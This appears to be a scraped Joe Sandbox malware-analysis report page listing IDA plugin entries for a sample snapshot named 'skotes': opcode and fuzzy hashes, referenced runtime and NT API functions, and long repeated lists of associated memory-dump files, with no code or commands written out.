                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2508902052-0
                                                                                                                                                                • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                • Instruction ID: 9b3c2b9185c6467f3dc5662f162799faa19f5cfdbb98342c1d3d5ff4c2e6cec3
                                                                                                                                                                • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                • Instruction Fuzzy Hash: 5D8157B1E04225AFCB19DFACC580A6DB7F6FF49304F154AA9D445AB701C730AD52CB84
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00BAEC81
                                                                                                                                                                  • Part of subcall function 00BA8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00BA8F50
                                                                                                                                                                • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00BAECE7
                                                                                                                                                                • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00BAECFF
                                                                                                                                                                • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00BAED0C
                                                                                                                                                                  • Part of subcall function 00BAE7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00BAE7D7
                                                                                                                                                                  • Part of subcall function 00BAE7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00BAE86F
                                                                                                                                                                  • Part of subcall function 00BAE7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00BAE879
                                                                                                                                                                  • Part of subcall function 00BAE7AF: Concurrency::location::_Assign.LIBCMT ref: 00BAE8AD
                                                                                                                                                                  • Part of subcall function 00BAE7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00BAE8B5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2363638799-0
                                                                                                                                                                • Opcode ID: e34dfe5e904dec34dcf20294709eb14363276b1fb557e0911020dbe21ed91e05
                                                                                                                                                                • Instruction ID: c39991993f5830258176c2d22130ced05e142387c6ef3382fc294335641c4be9
                                                                                                                                                                • Opcode Fuzzy Hash: e34dfe5e904dec34dcf20294709eb14363276b1fb557e0911020dbe21ed91e05
                                                                                                                                                                • Instruction Fuzzy Hash: BF51AF31A05205ABCF24EF60C895BADB7B1EF45310F1440E9E9567B3A2CB71AE05CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • NtFlushProcessWriteBuffers.NTDLL ref: 00B9CBAA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffersFlushProcessWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2982998374-0
                                                                                                                                                                • Opcode ID: c230a8a4309ee656a18514dab41152ce4ec19abfac539c07c39133ad35a9d896
                                                                                                                                                                • Instruction ID: 39147e694de2f790403cd6bff1fad0980df8ce318b3a3e2617321b7fd081c833
                                                                                                                                                                • Opcode Fuzzy Hash: c230a8a4309ee656a18514dab41152ce4ec19abfac539c07c39133ad35a9d896
                                                                                                                                                                • Instruction Fuzzy Hash: 57B09232A238344BCA612B14BC5869DBB98DA80B1130A01A6D801AB2248E105E824BD8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f36063ba5801b1e121eaf478006841f0c63d737719a0c5b715c03d931bc47f5a
                                                                                                                                                                • Instruction ID: fdc9a86d9dd36ead3afc0fe22f63c069ab21e0bf2eb82d2179a4a76b99a07d6c
                                                                                                                                                                • Opcode Fuzzy Hash: f36063ba5801b1e121eaf478006841f0c63d737719a0c5b715c03d931bc47f5a
                                                                                                                                                                • Instruction Fuzzy Hash: 48518AB2E016068BDF25CF5AD8C57AAB7F1FB58304F2485BAD405EB291D774A940CB90
                                                                                                                                                                APIs
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B9F2BB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
